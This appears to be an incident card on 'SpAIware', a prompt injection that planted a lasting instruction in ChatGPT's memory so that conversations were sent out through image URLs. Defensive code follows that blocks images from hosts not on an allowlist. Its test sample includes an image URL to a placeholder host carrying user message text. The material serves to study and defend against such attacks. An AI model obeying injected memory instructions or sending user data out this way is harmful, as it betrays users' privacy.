Indirect Prompt Injection · High

SpAIware: persistent ChatGPT memory injection

September 2024 · OpenAI ChatGPT (macOS)
What happened
A prompt injection could write a persistent instruction into ChatGPT's long-term memory, causing it to continuously exfiltrate the user's messages and the model's responses to an attacker's server across all future sessions.
Root cause
Untrusted content could write to persistent memory, and the macOS app rendered images, which allowed URL-based data egress. Memory persistence made the injection durable.
Fix / outcome
OpenAI shipped a fix in the ChatGPT macOS app that closed the image and URL exfiltration vector.
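One way a client can close the image-based egress path described under Root cause, shown as an added example (not OpenAI's fix and not code from this page): check every image URL in model output against a host allowlist before rendering. `ALLOWED_IMAGE_HOSTS`, the function names and the sample hosts are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts this client will fetch images from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Markdown image ![alt](url "title") and HTML <img ... src="url">.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)')
HTML_IMAGE = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)


def is_allowed_image_url(url: str) -> bool:
    """Allow only https URLs whose parsed host is allowlisted, without userinfo."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # parsed host, so "trusted@other-host" tricks fail
    except ValueError:
        return False
    return (parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS
            and parts.username is None)


def sanitize_for_render(text: str):
    """Return (safe_text, blocked_urls); blocked images become inert text."""
    blocked = []

    def md_sub(m):
        if is_allowed_image_url(m.group(2)):
            return m.group(0)
        blocked.append(m.group(2))
        return f"[image blocked: {m.group(1).strip() or 'untitled'}]"

    def html_sub(m):
        if is_allowed_image_url(m.group(1)):
            return m.group(0)
        blocked.append(m.group(1))
        return "[image blocked]"

    text = MD_IMAGE.sub(md_sub, text)
    return HTML_IMAGE.sub(html_sub, text), blocked


# Constructed sample of model output; collector.example is a placeholder host.
SAMPLE = (
    "Here is your summary.\n"
    "![chart](https://images.example.com/chart.png)\n"
    "![ ](https://collector.example/p.png?q=user%20message%20text)\n"
)

if __name__ == "__main__":
    safe_text, blocked_urls = sanitize_for_render(SAMPLE)
    print(safe_text, blocked_urls)
```

The list of blocked URLs is worth logging: a non-allowlisted image URL carrying conversation text in its query string is a strong signal that an injected instruction is active, possibly from persisted memory.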